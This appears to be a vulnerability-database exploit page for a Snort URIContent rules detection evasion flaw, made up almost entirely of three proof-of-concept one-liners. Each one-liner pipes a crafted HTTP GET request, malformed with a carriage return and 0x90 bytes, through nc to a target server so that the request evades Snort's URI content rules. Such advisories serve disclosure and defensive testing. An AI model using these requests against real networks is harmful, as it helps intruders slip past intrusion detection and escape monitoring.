• info
• discussion
• exploit
• solution
• references

Snort URIContent Rules Detection Evasion Vulnerability

Attackers can use a browser to exploit this issue.

Proofs of concept are available:

perl -e'print "GET /www.example.com?paramter=|backdoor\r http/1.0\r\n\r\n"'|nc vulnerable.server 80

perl -e 'print "GET \x90\x90\x0d http/1.0\r\n\r\n"'|nc 192.168.1.3 80

perl -e 'print "GET \x0d/index.php\x90\x90 HTTP/1.0\n\r\n"'|nc 192.168.1.3 80